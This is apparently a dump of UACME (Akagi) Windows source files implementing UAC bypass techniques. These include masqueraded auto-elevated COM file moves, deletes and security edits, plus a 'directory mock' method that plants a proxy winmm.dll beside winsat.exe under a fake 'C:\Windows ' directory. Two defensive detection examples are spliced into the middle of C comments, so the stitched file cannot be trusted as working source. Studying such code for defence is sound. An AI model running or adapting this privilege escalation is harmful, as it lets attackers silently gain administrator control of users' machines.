    HRESULT r = E_FAIL, hr_init;

    hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);

    do {
        //ucmxFileOpCreateAndRelease();

        if (S_OK != ucmAllocateElevatedObject(
            T_CLSID_FileOperation,
            &IID_IFileOperation,
            CLSCTX_LOCAL_SERVER,
            &FileOperation))
        {
            break;
        }

        if (FileOperation == NULL) {
            break;
        }

        if (S_OK != FileOperation->lpVtbl->SetOperationFlags(
            FileOperation,
            g_ctx->IFileOperationFlags))
        {
            break;
        }

        if (S_OK != SHCreateItemFromParsingName(
            FileName,
            NULL,
            &IID_IShellItem,
            &isrc))
        {
            break;
        }

        r = FileOperation->lpVtbl->DeleteItem(
            FileOperation,
            isrc,
            NULL);

        if (r != S_OK)
            break;

        if (S_OK != FileOperation->lpVtbl->PerformOperations(
            FileOperation))
        {
            break;
        }

        isrc->lpVtbl->Release(isrc);
        isrc = NULL;

        bResult = TRUE;

    } while (FALSE);

    if (FileOperation != NULL)
        FileOperation->lpVtbl->Release(FileOperation);

    if (isrc != NULL)
        isrc->lpVtbl->Release(isrc);

    if (hr_init == S_OK)
        CoUninitialize();

#ifdef _DEBUG
    if (bResult) {
        OutputDebugString(FileName);
        OutputDebugString(TEXT("\r\nCleanup success\r\n"));
    }
    else {
        OutputDebugString(TEXT("\r\nCleanup failed\r\n"));
    }
#endif

    return bResult;
}

/*
* ucmMasqueradedMoveFileCOM
*
* Purpose:
*
* Move file autoelevated.
* This function expects that supMasqueradeProcess was called on process initialization.
*
*/
BOOL ucmMasqueradedMoveFileCOM(
    _In_ LPCWSTR SourceFileName,
    _In_ LPCWSTR DestinationDir
)
{
    return ucmMasqueradedMoveCopyFileCOM(
        SourceFileName,
        DestinationDir,
        TRUE);
}

/*
* ucmMasqueradedGetObjectSecurityCOM
*
* Purpose:
*
* Get object security through ISecurityEditor(GetNamedInfo).
* This function expects that supMasqueradeProcess was called on process initialization.
*
* Note:
* Use CoTaskMemFree to release Sddl allocated memory as SecurityEditor->GetSecurity uses SHStrDupW to store result SDDL.
* */ BOOL ucmMasqueradedGetObjectSecurityCOM( _In_ LPCWSTR lpTargetObject, _In_ SECURITY_INFORMATION SecurityInformation, _In_ SE_OBJECT_TYPE ObjectType, _Inout_ LPOLESTR *Sddl ) { HRESULT r = E_FAIL, hr_init; ISecurityEditor* SecurityEditor = NULL; hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED); do { r = ucmAllocateElevatedObject( T_CLSID_ShellSecurityEditor, &IID_ISecurityEditor, CLSCTX_LOCAL_SERVER, &SecurityEditor); if (r != S_OK) break; if (SecurityEditor == NULL) { r = E_OUTOFMEMORY; break; } r = SecurityEditor->lpVtbl->GetSecurity( SecurityEditor, lpTargetObject, ObjectType, SecurityInformation, Sddl); } while (FALSE); if (SecurityEditor != NULL) { SecurityEditor->lpVtbl->Release(SecurityEditor); } if (hr_init == S_OK) CoUninitialize(); return SUCCEEDED(r); } /* * ucmMasqueradedSetObjectSecurityCOM * * Purpose: * * Change object security through ISecurityEditor(SetNamedInfo). * This function expects that supMasqueradeProcess was called on process initialization. * */ BOOL ucmMasqueradedSetObjectSecurityCOM( _In_ LPCWSTR lpTargetObject, _In_ SECURITY_INFORMATION SecurityInformation, _In_ SE_OBJECT_TYPE ObjectType, _In_ LPCWSTR NewSddl ) { HRESULT r = E_FAIL, hr_init; ISecurityEditor* SecurityEditor = NULL; hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED); do { r = ucmAllocateElevatedObject( T_CLSID_ShellSecurityEditor, &IID_ISecurityEditor, CLSCTX_LOCAL_SERVER, &SecurityEditor); if (r != S_OK) break; if (SecurityEditor == NULL) { r = E_OUTOFMEMORY; break; } r = SecurityEditor->lpVtbl->SetSecurity( SecurityEditor, lpTargetObject, ObjectType, SecurityInformation, NewSddl); } while (FALSE); if (SecurityEditor != NULL) { SecurityEditor->lpVtbl->Release(SecurityEditor); } if (hr_init == S_OK) CoUninitialize(); return SUCCEEDED(r); } ================================================ FILE: Source/Akagi/methods/comsup.h ================================================ /******************************************************************************* * 
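A check for the DACL state that ucmNICPoisonMethod2 creates, as an added example that is not UACME code: a minimal SDDL scanner that counts access-allowed ACEs granting full control to Everyone, Authenticated Users or Users, of the kind a defender would run over the string ucmMasqueradedGetObjectSecurityCOM (or "icacls /save") returns for the NativeImages cache directory. It relies only on the documented ACE syntax type;flags;rights;object_guid;inherit_object_guid;sid; conditional ACEs are not handled, and because the page does not show the contents of T_SDDL_EVERYONE_FULL_ACCESS, the SDDL strings exercised in the test are constructed.

```c
/* Added example, not UACME code: count "world gets full control" ACEs in an
   SDDL string. Conditional ACEs (XA/XD with a trailing condition) are not
   handled. */
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* "FA" / "GA" among the two-letter rights, or a hex mask carrying
   GENERIC_ALL (0x10000000) or FILE_ALL_ACCESS (0x1F01FF). */
static int rights_are_full(const char *rights, size_t len)
{
    size_t i;
    if (len > 2 && rights[0] == '0' && (rights[1] == 'x' || rights[1] == 'X')) {
        unsigned long mask = strtoul(rights, NULL, 16);
        return (mask & 0x10000000ul) != 0 || (mask & 0x1F01FFul) == 0x1F01FFul;
    }
    for (i = 0; i + 1 < len; i += 2)
        if ((rights[i] == 'G' || rights[i] == 'F') && rights[i + 1] == 'A')
            return 1;
    return 0;
}

/* Everyone, Authenticated Users and Users, by SDDL alias or by SID string. */
static int sid_is_world(const char *sid, size_t len)
{
    static const char *const world[] = {
        "WD", "AU", "BU", "S-1-1-0", "S-1-5-11", "S-1-5-32-545" };
    size_t i;
    for (i = 0; i < sizeof world / sizeof world[0]; i++)
        if (strlen(world[i]) == len && memcmp(sid, world[i], len) == 0)
            return 1;
    return 0;
}

/* Number of access-allowed ACEs in the D: section that give a world principal
   full control. 0 when there is no DACL section, -1 on malformed input. */
int sddl_count_world_full_access(const char *sddl)
{
    const char *p = strstr(sddl, "D:"), *end, *q, *start[6];
    size_t len[6];
    int count = 0, n, i;

    if (p == NULL) return 0;
    p += 2;
    while (*p && *p != '(' && *p != ':') p++;   /* skip DACL flags such as PAI */
    while (*p == '(') {
        end = strchr(p, ')');
        if (end == NULL) return -1;
        start[0] = p + 1;
        n = 1;
        for (q = p + 1; q < end; q++)            /* split the six ACE fields */
            if (*q == ';' && n < 6) start[n++] = q + 1;
        if (n != 6) return -1;
        for (i = 0; i < 6; i++)
            len[i] = (size_t)((i < 5 ? start[i + 1] - 1 : end) - start[i]);
        if (len[0] == 1 && start[0][0] == 'A' &&  /* access-allowed only */
            rights_are_full(start[2], len[2]) &&
            sid_is_world(start[5], len[5]))
            count++;
        p = end + 1;                              /* stops at "S:" or end */
    }
    return count;
}
```

Run this against the SDDL captured before the method and again afterwards: the stock cache directory yields 0, and any non-zero count while no elevated installer is expected to be running is worth an alert. Deny ACEs are deliberately ignored, so a hardening ACE such as (D;;FA;;;WD) does not count.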
* (C) COPYRIGHT AUTHORS, 2017 - 2022 * * TITLE: COMSUP.H * * VERSION: 3.63 * * DATE: 16 Jul 2022 * * Prototypes and definitions for COM interfaces and routines. * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. * *******************************************************************************/ #pragma once #define HRESULT_BREAK_ON_FAILED(hr) { if (FAILED(hr)) break; } #define HRESULT_RETURN_ON_FAILED(hr) { if (FAILED(hr)) return; } #define HRESULT_RETURN_VALUE_ON_FAILED(hr, value) { if (FAILED(hr)) return value; } #ifndef UCM_DEFINE_GUID #define UCM_DEFINE_GUID(name, l, w1, w2, b1, b2, b3, b4, b5, b6, b7, b8) \ EXTERN_C const GUID DECLSPEC_SELECTANY name \ = { l, w1, w2, { b1, b2, b3, b4, b5, b6, b7, b8 } } #endif UCM_DEFINE_GUID(IID_IColorDataProxy, 0x0A16D195, 0x6F47, 0x4964, 0x92, 0x87, 0x9F, 0x4B, 0xAB, 0x6D, 0x98, 0x27); UCM_DEFINE_GUID(IID_ICMLuaUtil, 0x6EDD6D74, 0xC007, 0x4E75, 0xB7, 0x6A, 0xE5, 0x74, 0x09, 0x95, 0xE2, 0x4C); UCM_DEFINE_GUID(IID_IFwCplLua, 0x56DA8B35, 0x7FC3, 0x45DF, 0x87, 0x68, 0x66, 0x41, 0x47, 0x86, 0x45, 0x73); UCM_DEFINE_GUID(IID_ISecurityEditor, 0x14B2C619, 0xD07A, 0x46EF, 0x8B, 0x62, 0x31, 0xB6, 0x4F, 0x3B, 0x84, 0x5C); UCM_DEFINE_GUID(IID_EditionUpgradeManager, 0xF2DCB80D, 0x0670, 0x44BC, 0x90, 0x02, 0xCD, 0x18, 0x68, 0x87, 0x30, 0xAF); UCM_DEFINE_GUID(IID_IEAxiAdminInstaller, 0x9AEA8A59, 0xE0C9, 0x40F1, 0x87, 0xDD, 0x75, 0x70, 0x61, 0xD5, 0x61, 0x77); UCM_DEFINE_GUID(IID_IEAxiInstaller2, 0xBC0EC710, 0xA3ED, 0x4F99, 0xB1, 0x4F, 0x5F, 0xD5, 0x9F, 0xDA, 0xCE, 0xA3); UCM_DEFINE_GUID(IID_WscAdmin, 0x49ACAA99, 0xF009, 0x4524, 0x9D, 0x2A, 0xD7, 0x51, 0xC9, 0xA3, 0x8F, 0x60); UCM_DEFINE_GUID(IID_ElevatedFactoryServer, 0x804BD226, 0xAF47, 0x04D71, 0xB4, 0x92, 0x44, 0x3A, 0x57, 0x61, 0x0B, 0x08); HRESULT ucmAllocateElevatedObject( _In_ LPCWSTR lpObjectCLSID, _In_ REFIID 
riid, _In_ DWORD dwClassContext, _Outptr_ void **ppv); BOOL ucmMasqueradedCreateSubDirectoryCOM( _In_ LPCWSTR ParentDirectory, _In_ LPCWSTR SubDirectory); BOOL ucmMasqueradedMoveCopyFileCOM( _In_ LPCWSTR SourceFileName, _In_ LPCWSTR DestinationDir, _In_ BOOL fMove); BOOL ucmMasqueradedMoveFileCOM( _In_ LPCWSTR SourceFileName, _In_ LPCWSTR DestinationDir); BOOL ucmMasqueradedDeleteDirectoryFileCOM( _In_ LPCWSTR FileName); BOOL ucmMasqueradedRenameElementCOM( _In_ LPCWSTR OldName, _In_ LPCWSTR NewName); BOOL ucmMasqueradedGetObjectSecurityCOM( _In_ LPCWSTR lpTargetObject, _In_ SECURITY_INFORMATION SecurityInformation, _In_ SE_OBJECT_TYPE ObjectType, _Inout_ LPOLESTR *Sddl); BOOL ucmMasqueradedSetObjectSecurityCOM( _In_ LPCWSTR lpTargetObject, _In_ SECURITY_INFORMATION SecurityInformation, _In_ SE_OBJECT_TYPE ObjectType, _In_ LPCWSTR NewSddl); ================================================ FILE: Source/Akagi/methods/dwells.c ================================================ /******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2018 - 2020 * * TITLE: DWELLS.C * * VERSION: 3.50 * * DATE: 14 Sep 2020 * * David Wells based method. * * Original method URL: * https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. * *******************************************************************************/ #include "global.h" /* * ucmDirectoryMockMethod * * Purpose: * * UAC bypass abusing GetLongPathNameW behavior during AIS. 
*
*/
NTSTATUS ucmDirectoryMockMethod(
    _In_ PVOID ProxyDll,
    _In_ DWORD ProxyDllSize
)
{
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
    HANDLE hFakeWindows = NULL;
    UNICODE_STRING usDirectoryName;
    OBJECT_ATTRIBUTES ObjectAttributes;
    WCHAR szPayloadDir[MAX_PATH * 2];
    WCHAR szSource[MAX_PATH * 2];
    WCHAR szDest[MAX_PATH * 2];

    do {
        //
        // Create destination dir "system32" in %temp%
        //
        _strcpy(szPayloadDir, g_ctx->szTempDirectory);
        _strcat(szPayloadDir, L"system32\\");
        if (!CreateDirectory(szPayloadDir, NULL)) {
            if (GetLastError() != ERROR_ALREADY_EXISTS)
                break;
        }

        //
        // Drop fubuki to %temp%\system32 as winmm.dll
        //
        _strcpy(szDest, szPayloadDir);
        _strcat(szDest, WINMM_DLL);
        if (!supWriteBufferToFile(szDest, ProxyDll, ProxyDllSize))
            break;

        //
        // Copy winsat to %temp%\system32
        //
        _strcpy(szSource, g_ctx->szSystemDirectory);
        _strcat(szSource, WINSAT_EXE);
        _strcpy(szDest, szPayloadDir);
        _strcat(szDest, WINSAT_EXE);
        if (!CopyFile(szSource, szDest, FALSE))
            break;

        //
        // Fake root.
        //
        RtlSecureZeroMemory(szSource, sizeof(szSource));
        szSource[0] = L'\\';
        szSource[1] = L'?';
        szSource[2] = L'?';
        szSource[3] = L'\\';
        _strncpy(&szSource[4], 4, g_ctx->szSystemRoot, 4);
        _strcat(szSource, L"Windows ");

        RtlInitUnicodeString(&usDirectoryName, szSource);
        InitializeObjectAttributes(&ObjectAttributes, &usDirectoryName, OBJ_CASE_INSENSITIVE, NULL, NULL);

        if (!NT_SUCCESS(supCreateDirectory(
            &hFakeWindows,
            &ObjectAttributes,
            FILE_SHARE_READ | FILE_SHARE_WRITE,
            FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN)))
        {
            break;
        }

        //
        // Set reparse to %temp%.
        //
        _strcpy(szSource, L"\\??\\");
        _strcat(szSource, g_ctx->szTempDirectory);
        supSetMountPoint(
            hFakeWindows,
            szSource,
            &szSource[4]);

        //
        // Run target application.
        //
        RtlSecureZeroMemory(&szSource, sizeof(szSource));
        _strncpy(szSource, 4, g_ctx->szSystemRoot, 4);
        _strcat(szSource, L"Windows \\system32\\");
        _strcat(szSource, WINSAT_EXE);
        if (supRunProcess(szSource, NULL))
            MethodResult = STATUS_SUCCESS;

    } while (FALSE);

    //
    // Cleanup.
// if (hFakeWindows) { // // Remove reparse point. // supDeleteMountPoint(hFakeWindows); NtClose(hFakeWindows); // // Remove directory. // RtlSecureZeroMemory(szSource, sizeof(szSource)); szSource[0] = L'\\'; szSource[1] = L'?'; szSource[2] = L'?'; szSource[3] = L'\\'; _strncpy(&szSource[4], 4, g_ctx->szSystemRoot, 4); _strcat(szSource, L"Windows "); RtlInitUnicodeString(&usDirectoryName, szSource); InitializeObjectAttributes(&ObjectAttributes, &usDirectoryName, OBJ_CASE_INSENSITIVE, NULL, NULL); NtDeleteFile(&ObjectAttributes); } return MethodResult; } ================================================ FILE: Source/Akagi/methods/elvint.h ================================================ /******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2018 - 2022 * * TITLE: ELVINT.H * * VERSION: 3.62 * * DATE: 04 Jul 2022 * * Prototypes and definitions for elevated interface methods. * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. 
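The path mismatch ucmDirectoryMockMethod relies on, as an added example that is not UACME code: the mock directory "C:\Windows " (trailing space, created through the native API so the space survives) is a different object from "C:\Windows", yet the Win32 canonical form of a path beneath it loses the space, so a trusted-directory comparison done on the canonical form passes while the loader runs from the mock tree. The functions below model canonicalisation as trimming trailing spaces and dots from every component (keeping "." and ".."); that model is this example's own assumption, not Windows' code, and path_spoofs_trusted_dir flags a path that lands under a trusted prefix only because of such trimming.

```c
/* Added example, not UACME code: detect paths that only look trusted after
   component trimming. The trimming rule is a model, not Windows' own code. */
#include <stddef.h>
#include <string.h>
#include <ctype.h>

/* Drop trailing ' ' and '.' from out[comp_start..n); "." and ".." are kept. */
static size_t trim_component(char *out, size_t comp_start, size_t n)
{
    size_t i, has_name = 0;
    for (i = comp_start; i < n; i++)
        if (out[i] != ' ' && out[i] != '.') has_name = 1;
    if (!has_name) return n;
    while (n > comp_start && (out[n - 1] == ' ' || out[n - 1] == '.')) n--;
    return n;
}

/* Canonicalise a DOS-style path into out. 0 on success, -1 if out is too small. */
int win_normalize_components(const char *path, char *out, size_t cap)
{
    size_t n = 0, comp_start = 0;
    for (;; path++) {
        char c = *path;
        if (n + 1 >= cap) return -1;
        if (c == '\\' || c == '\0') {
            n = trim_component(out, comp_start, n);
            out[n++] = c;
            if (c == '\0') return 0;
            comp_start = n;
        } else {
            out[n++] = c;
        }
    }
}

/* Case-insensitive "s starts with prefix", as NTFS names compare. */
static int prefix_ieq(const char *s, const char *prefix)
{
    for (; *prefix; s++, prefix++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix)) return 0;
    return 1;
}

/* 1 if canonicalising path yields exactly expected. */
int normalizes_to(const char *path, const char *expected)
{
    char buf[512];
    return win_normalize_components(path, buf, sizeof buf) == 0 &&
           strcmp(buf, expected) == 0;
}

/* 1 if path falls under trusted_dir only after canonicalisation (the mock
   directory case), 0 if it is genuinely inside or genuinely outside it,
   -1 on buffer error. trusted_dir should end with a backslash. */
int path_spoofs_trusted_dir(const char *path, const char *trusted_dir)
{
    char norm[512];
    if (win_normalize_components(path, norm, sizeof norm) != 0) return -1;
    if (!prefix_ieq(norm, trusted_dir)) return 0;      /* untrusted either way */
    return prefix_ieq(path, trusted_dir) ? 0 : 1;      /* trusted only after trimming */
}
```

The practical lesson is the one the method demonstrates: any trust decision made on a canonicalised Win32 path must be paired with a check that the raw path (or better, the opened file's real path) is byte-for-byte inside the trusted directory, otherwise a directory whose name differs only by trailing whitespace passes.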
* *******************************************************************************/ #pragma once typedef interface IColorDataProxy IColorDataProxy; typedef interface ICMLuaUtil ICMLuaUtil; typedef interface IFwCplLua IFwCplLua; typedef interface IEditionUpgradeManager IEditionUpgradeManager; typedef interface ISecurityEditor ISecurityEditor; typedef interface IIEAdminBrokerObject IIEAdminBrokerObject; typedef interface IActiveXInstallBroker IActiveXInstallBroker; typedef interface IWscAdmin IWscAdmin; typedef interface IElevatedFactoryServer IElevatedFactoryServer; //VTBL DEF typedef struct IColorDataProxyVtbl { BEGIN_INTERFACE HRESULT(STDMETHODCALLTYPE *QueryInterface)( __RPC__in IColorDataProxy * This, __RPC__in REFIID riid, _COM_Outptr_ void **ppvObject); ULONG(STDMETHODCALLTYPE *AddRef)( __RPC__in IColorDataProxy * This); ULONG(STDMETHODCALLTYPE *Release)( __RPC__in IColorDataProxy * This); HRESULT(STDMETHODCALLTYPE *Method1)( __RPC__in IColorDataProxy * This); HRESULT(STDMETHODCALLTYPE *Method2)( __RPC__in IColorDataProxy * This); HRESULT(STDMETHODCALLTYPE *Method3)( __RPC__in IColorDataProxy * This); HRESULT(STDMETHODCALLTYPE *Method4)( __RPC__in IColorDataProxy * This); HRESULT(STDMETHODCALLTYPE *Method5)( __RPC__in IColorDataProxy * This); HRESULT(STDMETHODCALLTYPE *Method6)( __RPC__in IColorDataProxy * This); HRESULT(STDMETHODCALLTYPE *Method7)( __RPC__in IColorDataProxy * This); HRESULT(STDMETHODCALLTYPE *Method8)( __RPC__in IColorDataProxy * This); HRESULT(STDMETHODCALLTYPE *Method9)( __RPC__in IColorDataProxy * This); HRESULT(STDMETHODCALLTYPE *Method10)( __RPC__in IColorDataProxy * This); HRESULT(STDMETHODCALLTYPE *Method11)( __RPC__in IColorDataProxy * This); HRESULT(STDMETHODCALLTYPE *LaunchDccw)( __RPC__in IColorDataProxy * This, _In_ HWND hwnd); END_INTERFACE } *PIColorDataProxyVtbl; typedef struct ICMLuaUtilVtbl { BEGIN_INTERFACE HRESULT(STDMETHODCALLTYPE *QueryInterface)( __RPC__in ICMLuaUtil * This, __RPC__in REFIID riid, _COM_Outptr_ void 
**ppvObject); ULONG(STDMETHODCALLTYPE *AddRef)( __RPC__in ICMLuaUtil * This); ULONG(STDMETHODCALLTYPE *Release)( __RPC__in ICMLuaUtil * This); //incomplete definition HRESULT(STDMETHODCALLTYPE *SetRasCredentials)( __RPC__in ICMLuaUtil * This); //incomplete definition HRESULT(STDMETHODCALLTYPE *SetRasEntryProperties)( __RPC__in ICMLuaUtil * This); //incomplete definition HRESULT(STDMETHODCALLTYPE *DeleteRasEntry)( __RPC__in ICMLuaUtil * This); //incomplete definition HRESULT(STDMETHODCALLTYPE *LaunchInfSection)( __RPC__in ICMLuaUtil * This); //incomplete definition HRESULT(STDMETHODCALLTYPE *LaunchInfSectionEx)( __RPC__in ICMLuaUtil * This); //incomplete definition HRESULT(STDMETHODCALLTYPE *CreateLayerDirectory)( __RPC__in ICMLuaUtil * This); HRESULT(STDMETHODCALLTYPE *ShellExec)( __RPC__in ICMLuaUtil * This, _In_ LPCTSTR lpFile, _In_opt_ LPCTSTR lpParameters, _In_opt_ LPCTSTR lpDirectory, _In_ ULONG fMask, _In_ ULONG nShow); HRESULT(STDMETHODCALLTYPE *SetRegistryStringValue)( __RPC__in ICMLuaUtil * This, _In_ HKEY hKey, _In_opt_ LPCTSTR lpSubKey, _In_opt_ LPCTSTR lpValueName, _In_ LPCTSTR lpValueString); HRESULT(STDMETHODCALLTYPE *DeleteRegistryStringValue)( __RPC__in ICMLuaUtil * This, _In_ HKEY hKey, _In_ LPCTSTR lpSubKey, _In_ LPCTSTR lpValueName); //incomplete definition HRESULT(STDMETHODCALLTYPE *DeleteRegKeysWithoutSubKeys)( __RPC__in ICMLuaUtil * This); //incomplete definition HRESULT(STDMETHODCALLTYPE *DeleteRegTree)( __RPC__in ICMLuaUtil * This); HRESULT(STDMETHODCALLTYPE *ExitWindowsFunc)( __RPC__in ICMLuaUtil * This); //incomplete definition HRESULT(STDMETHODCALLTYPE *AllowAccessToTheWorld)( __RPC__in ICMLuaUtil * This); //incomplete definition HRESULT(STDMETHODCALLTYPE *CreateFileAndClose)( __RPC__in ICMLuaUtil * This); //incomplete definition HRESULT(STDMETHODCALLTYPE *DeleteHiddenCmProfileFiles)( __RPC__in ICMLuaUtil * This); //incomplete definition HRESULT(STDMETHODCALLTYPE *CallCustomActionDll)( __RPC__in ICMLuaUtil * This); 
HRESULT(STDMETHODCALLTYPE *RunCustomActionExe)( __RPC__in ICMLuaUtil * This, _In_ LPCTSTR lpFile, _In_opt_ LPCTSTR lpParameters, _COM_Outptr_ LPCTSTR *pszHandleAsHexString); //incomplete definition HRESULT(STDMETHODCALLTYPE *SetRasSubEntryProperties)( __RPC__in ICMLuaUtil * This); //incomplete definition HRESULT(STDMETHODCALLTYPE *DeleteRasSubEntry)( __RPC__in ICMLuaUtil * This); //incomplete definition HRESULT(STDMETHODCALLTYPE *SetCustomAuthData)( __RPC__in ICMLuaUtil * This); END_INTERFACE } *PICMLuaUtilVtbl; typedef struct IFwCplLuaInterfaceVtbl { BEGIN_INTERFACE HRESULT(STDMETHODCALLTYPE* QueryInterface)( __RPC__in IFwCplLua* This, __RPC__in REFIID riid, _COM_Outptr_ void** ppvObject); ULONG(STDMETHODCALLTYPE* AddRef)( __RPC__in IFwCplLua* This); ULONG(STDMETHODCALLTYPE* Release)( __RPC__in IFwCplLua* This); //incomplete definition HRESULT(STDMETHODCALLTYPE* GetTypeInfoCount)( __RPC__in IFwCplLua* This); //incomplete definition HRESULT(STDMETHODCALLTYPE* GetTypeInfo)( __RPC__in IFwCplLua* This); //incomplete definition HRESULT(STDMETHODCALLTYPE* GetIDsOfNames)( __RPC__in IFwCplLua* This); //incomplete definition HRESULT(STDMETHODCALLTYPE* Invoke)( __RPC__in IFwCplLua* This); //incomplete definition HRESULT(STDMETHODCALLTYPE* AddGlobalPort)( __RPC__in IFwCplLua* This); //incomplete definition HRESULT(STDMETHODCALLTYPE* AddProgram)( __RPC__in IFwCplLua* This); //incomplete definition HRESULT(STDMETHODCALLTYPE* DeleteGlobalPort)( __RPC__in IFwCplLua* This); //incomplete definition HRESULT(STDMETHODCALLTYPE* DeleteApplication)( __RPC__in IFwCplLua* This); //incomplete definition HRESULT(STDMETHODCALLTYPE* EnablePort)( __RPC__in IFwCplLua* This); //incomplete definition HRESULT(STDMETHODCALLTYPE* EnableProgram)( __RPC__in IFwCplLua* This); //incomplete definition HRESULT(STDMETHODCALLTYPE* EnableRuleGroup)( __RPC__in IFwCplLua* This); //incomplete definition HRESULT(STDMETHODCALLTYPE* EnableCustomRule)( __RPC__in IFwCplLua* This); //incomplete definition 
HRESULT(STDMETHODCALLTYPE* EditGlobalPort)( __RPC__in IFwCplLua* This); //incomplete definition HRESULT(STDMETHODCALLTYPE* EditProgram)( __RPC__in IFwCplLua* This); //incomplete definition HRESULT(STDMETHODCALLTYPE* Activate)( __RPC__in IFwCplLua* This); HRESULT(STDMETHODCALLTYPE* LaunchAdvancedUI)( __RPC__in IFwCplLua* This); END_INTERFACE } *PIFwCplLuaInterfaceVtbl; typedef struct IEditionUpgradeManagerVtbl { BEGIN_INTERFACE HRESULT(STDMETHODCALLTYPE *QueryInterface)( __RPC__in IEditionUpgradeManager * This, __RPC__in REFIID riid, _COM_Outptr_ void **ppvObject); ULONG(STDMETHODCALLTYPE *AddRef)( __RPC__in IEditionUpgradeManager * This); ULONG(STDMETHODCALLTYPE *Release)( __RPC__in IEditionUpgradeManager * This); //incomplete definition HRESULT(STDMETHODCALLTYPE *InitializeWindow)( __RPC__in IEditionUpgradeManager * This); //incomplete definition HRESULT(STDMETHODCALLTYPE *UpdateOperatingSystem)( __RPC__in IEditionUpgradeManager * This); //incomplete definition HRESULT(STDMETHODCALLTYPE *ShowProductKeyUI)( __RPC__in IEditionUpgradeManager * This); //incomplete definition HRESULT(STDMETHODCALLTYPE *UpdateOperatingSystemWithParams)( __RPC__in IEditionUpgradeManager * This); //incomplete definition HRESULT(STDMETHODCALLTYPE *AcquireModernLicenseForWindows)( __RPC__in IEditionUpgradeManager * This); HRESULT(STDMETHODCALLTYPE *AcquireModernLicenseWithPreviousId)( __RPC__in IEditionUpgradeManager * This, __RPC__in LPWSTR PreviousId, __RPC__in DWORD *Data); //incomplete, irrelevant END_INTERFACE } *PIEditionUpgradeManagerVtbl; typedef struct ISecurityEditorVtbl { BEGIN_INTERFACE HRESULT(STDMETHODCALLTYPE *QueryInterface)( __RPC__in ISecurityEditor * This, __RPC__in REFIID riid, _COM_Outptr_ void **ppvObject); ULONG(STDMETHODCALLTYPE *AddRef)( __RPC__in ISecurityEditor * This); ULONG(STDMETHODCALLTYPE *Release)( __RPC__in ISecurityEditor * This); HRESULT(STDMETHODCALLTYPE *GetSecurity)( __RPC__in ISecurityEditor * This, _In_ LPCOLESTR ObjectName, _In_ SE_OBJECT_TYPE 
        ObjectType,
        _In_ SECURITY_INFORMATION SecurityInfo,
        _Out_opt_ LPCOLESTR * ppSDDLStr);

    HRESULT(STDMETHODCALLTYPE *SetSecurity)(
        __RPC__in ISecurityEditor * This,
        _In_ LPCOLESTR ObjectName,
        _In_ SE_OBJECT_TYPE ObjectType,
        _In_ SECURITY_INFORMATION SecurityInfo,
        _In_ LPCOLESTR ppSDDLStr);

    END_INTERFACE

} *PISecurityEditorVtbl;

typedef struct IIEAdminBrokerObjectVtbl {

    BEGIN_INTERFACE

    HRESULT(STDMETHODCALLTYPE* QueryInterface)(
        __RPC__in IIEAdminBrokerObject* This,
        __RPC__in REFIID riid,
        _COM_Outptr_ void** ppvObject);

    ULONG(STDMETHODCALLTYPE* AddRef)(
        __RPC__in IIEAdminBrokerObject* This);

    ULONG(STDMETHODCALLTYPE* Release)(
        __RPC__in IIEAdminBrokerObject* This);

    //incomplete definition
    HRESULT(STDMETHODCALLTYPE* InitializeAdminInstaller)(
        __RPC__in IIEAdminBrokerObject* This,
        _In_opt_ LPCOLESTR ProviderName,
        _In_ DWORD Unknown0,
        _COM_Outptr_ void** InstanceGuid);

    END_INTERFACE

} *PIIEAdminBrokerObjectVtbl;

typedef struct IActiveXInstallBrokerVtbl {

    BEGIN_INTERFACE

    HRESULT(STDMETHODCALLTYPE* QueryInterface)(
        __RPC__in IActiveXInstallBroker* This,
        __RPC__in REFIID riid,
        _COM_Outptr_ void** ppvObject);

    ULONG(STDMETHODCALLTYPE* AddRef)(
        __RPC__in IActiveXInstallBroker* This);

    ULONG(STDMETHODCALLTYPE* Release)(
        __RPC__in IActiveXInstallBroker* This);

    //incomplete definition
    HRESULT(STDMETHODCALLTYPE* VerifyFile)(
        __RPC__in IActiveXInstallBroker* This,
        _In_ BSTR InstanceGuid,
        _In_ HWND ParentWindow,
        _In_ BSTR Unknown0,
        _In_ BSTR pcwszFilePath,
        _In_ BSTR Unknown1,
        _In_ ULONG dwUIChoice,
        _In_ ULONG dwUIContext,
        _In_ REFGUID GuidKey,
        _Out_ BSTR* VerifiedFileName,
        _Out_ PULONG CertDetailsSize,
        _Out_ void** CertDetails);

    HRESULT(STDMETHODCALLTYPE* RunSetupCommand)(
        __RPC__in IActiveXInstallBroker* This,
        _In_ BSTR InstanceGuid,
        _In_ HWND ParentWindow,
        _In_ BSTR szCmdName,
        _In_ BSTR szInfSection,
        _In_ BSTR szDir,
        _In_ BSTR szTitle,
        _In_ ULONG dwFlags,
        _Out_ PHANDLE lpTargetHandle);

    //incomplete definition

    END_INTERFACE

} *PIActiveXInstallBrokerVtbl;

typedef struct IWscAdminVtbl {
    BEGIN_INTERFACE

    HRESULT(STDMETHODCALLTYPE* QueryInterface)(
        __RPC__in IWscAdmin* This,
        __RPC__in REFIID riid,
        _COM_Outptr_ void** ppvObject);

    ULONG(STDMETHODCALLTYPE* AddRef)(
        __RPC__in IWscAdmin* This);

    ULONG(STDMETHODCALLTYPE* Release)(
        __RPC__in IWscAdmin* This);

